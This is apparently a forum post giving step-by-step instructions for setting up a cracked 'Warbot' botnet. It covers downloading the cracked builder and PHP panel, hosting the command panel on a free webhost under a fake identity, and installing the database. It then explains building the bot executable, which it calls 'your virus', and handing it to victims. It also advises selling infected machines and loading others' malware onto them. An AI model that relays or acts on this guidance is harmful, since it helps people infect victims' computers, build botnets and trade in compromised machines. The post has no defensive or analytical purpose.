Hi This will include step by step and if i leave anything out please let me know.
Step #1. First we need to have the builder and files. I give ALL credit to Redtube and ToKe. for this download and crack as he cracked it and this is HIS download link not mine & the PHP files are from ToKe so than you do both of them.
Click Me To Download (PHP files and Builder).
Step #2. Once that file is downloaded, go to where you saved it, and unzip it OR extract it (This will depend on whether you have WinRAR or not, if you have WinRAR you can extract it, if you don't simply Unzip it)
Step #3. Now we need to find a webhost for these wonderful files we have! I have only been able to use http://www.000webhost.com, if you are planning to host a BIG botnet, I really advise you to use Offshore VPS hosting. OK so where were we.. oh yes .. Sign up for the site by visiting the home page that i just listed above (http://www.000webhost.com) and you will see 2 columns, Free Hosting, and Premium Hosting, choose Free Hosting by pressing the "Order Now" button as seen here:
Step #4. OK GREAT! Now your at the signup sheet. You will see the top 2 options are "I want to host my domain" or "I will choose your free domain". Seeing as I myself have no money. I choose and recommend we all choose "the free subdomain". So enter what you want your site name to be: example: if you enter "monkey" your site will be
PLEASE NOTE: you notice how after "monkey" i have coxma. It may not be "coxma" for you, and will most likely be something ENTIRELY different it will differ so do not worry if you don't see "coxma" after your "site name". Next enter yours or a fake name (i recommend fake) and your email address (i recommend making a side email and not using your real one) but note it is important because the email you register will recieve important information. Type your desired account password and the image numbers and agree with the terms of service. Then wait for 7 seconds while it sets up your account, when it reloads the page go to step #5!
Step #5. Congratulations you should now have an account! If you've done everything right so far, you should have a page that looks like this:
Click Enter Control panel and continue to Step #6.
Step #6. OK so now we are at our control panel. We must now create an SQL Database, as this will be important later. Click on "MySQL" which is half-way down the page under the heading "Software/Services". You will then at a page where there is a form. Choose a MySQL Database name (this can be whatever you like) as well as a MySQL User (also whatever you like). Make a password of your choice and type it in the second field again to confirm. Then click the button "Create Database". Once you do that you should click " [ Back to Control Panel ] ".
Step #7. OK so, so far just to recap, we've downloaded the appropriate files, made a webhost, made a SQL Database. Now we actually need to upload the files and install them to the webhost. This is the tricky part so be extremely careful here. Back at your control panel, go to "File Manager" under the heading "Files". If it asks for a password, use the password you used for your account. You should now have a window on front of you looking like this
Click on public html!
Step #8. Now once in public html, select the "default.php" by checking it to the left of the name, then at the top right of the entire window there should be a "delete" button, then click the green checkmark to delete it. Click that and delete the default.php!. Now it's time to upload your files. Go to where you extracted OR Unzipped your Cracked Warbot ZIP/RAR files. Now when you double click and open that folder, in it you should have your builder & bot, and a "PHP" folder. You know need to RIGHT CLICK that "PHP" folder, and if you have WinRAR, you need to "add to archive" and make sure it is a "ZIP" file. If you don't have winrar compress it into a zip file. If you have WinRAR, look at this image:
Now once you have "zipped" the "PHP" folder, go back to your internet browser and to your File manger > public html, and press the "upload" button.
Step #9. By now you should be at an upload screen, where there are 2 different uploading options. Like so :
Use the upload on the right, like in the image, click "browse" and wherever you archived/zipped your "ZIP" PHP file to, go there and upload the ZIPPED PHP file, by clicking the green checkmark once again. Once you've clicked the green checkmark to upload it, you should be refreshed to a page where it gives you a very long list of files you've just uploaded. Click the "Blue arrow pointing backwards" which will lead you back to the public html file directory.
Step #10. Now we must set chmods to 777. SO, check the box to the left of your PHP.ZIP file (in other words select it) and then once again at the top right of the window, beside "rename" choose "chmod". You should now be at a window like this :
Set the Chmod value to "777" and check the 2 boxes below it. Once you've done that, click the green arrow. You should now be redirected to another long list of all the things you've sucessfully chmodded to 777! Click the blue back arrow button now.
Step #11. Now we need to install. SO here's where you need to follow along closely. First, go to your site by doing this : http://(yoursitename).(WhateverTheyHaveF...HP/install PLEASE NOTE : Capitalization when typing in your site does matter!!! PHP must be capitalized!!. Once you have entered that URL you should be at this screen :
Now, remember that MySQL database you created in Step #6. This is where it comes in handy.
Step #12. Go back to your Control Panel where MySQL is, and click on MySQL again. You should now see your version of this :
Now your smart if you've gotten this far but I'll explain anyways. Enter a desired login User name and password for your botnet (you will use this everytime you login to your botnet.) Now for the database name, copy and paste the entire "MySQL Database" text in your other window, and paste it in the install field called "Database Username". Do that with "MySQL User" for "Database Username" and "MySQL Host" for "Database Hostname". Once your done that click install!
Step #13. Great!! You've installed your botnet. Now you need to delete the install. So go back to File Manager, go to "public html" then click on "PHP" just like you did with public html. You should now see this :
So select the install file, then click delete, and then the green checkmark.
Step #14. Your almost there!! You just need to build your actual virus now, and your good to go. So by now you can login to your botnet if you've done everything right. If you go to "http://(yoursitename).(whatever).com/PHP" you should come to a login screen. Enter the user and pass you set for that and youll be inside your Warbot Botnet. Now it's time to build your bot. So go back to the folder you extracted originally. Now go to the "builder and bot" folder or extract it if it is still in a ZIP or RAR file to make it into a folder if it is not already. Then click on "Redtube.exe". Now a CMD looking window should popup asking you for the URL of your control panel. So enter in your URL...
EX: http://(yoursitename).(whatever).com/PHP
then press enter. Next it will ask for user agent. For this simple type "default" (without quotations of course). Press enter. Next is your update frequence. This is how often you want your bots updated in minutes. I strongly recommend that you do not set this to anything under 5. If your constantly pinging your bots it could make them unstable! I set mine to 5. For mutex string, set it to something random like it says for me im going to put "qorjt492642yergw" (lol i just put my hand on my keyboard). Press enter. Now for the next 2 type "default" and enter for both, and the window should close. Now back in your folder, the "Original.exe should have updated. This is now what you will give to people to open who you want to be part of your botnet.
Step #15. Give yourself a pat on the back! You've downloaded the proper files, created a webhost, created a SQL Database, uploaded proper files, chmod it to 777, install it, delete the install, make your botnet account, made your virus!. We now need to import "fix.sql", which enable us to control our bots. I will upload it and post a virus scan **DOWNLOAD**: "Click Me To Download"
OK so you've downloaded fix.sql. We now need to import it. So go to your control panel of your webhost, then right beside MySQL, (to the right) click "PhpMyAdmin". You should now be at a form similiar like the form when you created your SQL Database. BUT we will not be creating one, we need to import fix.sql, so in the table where it should give you your SQL Database, User and "phpMyAdmin". Click "Enter phpMyAdmin". Once you are there you should get a table of options. Click import, like here:
Now click browse.. and choose "fix.sql" which is the file you downloaded. Then click "Go" and you've sucessfully uploaded fix.sql! ALSO THE VIRUS SCAN IS ON PAGE 3!!
Some Side Notes: Warbot isn't really for DDoSing from what I've seen. I see this bot and it looks more if your into selling bots/zombies. As you can see the "Load" button enables you to install other peoples viruses on your bots quite easily, and will actually give you a username and password for the person buying your bots, to see if you've done it.(Temporary Login). I am not really sure about the Console yet, so if anyone has any info on it please do share.
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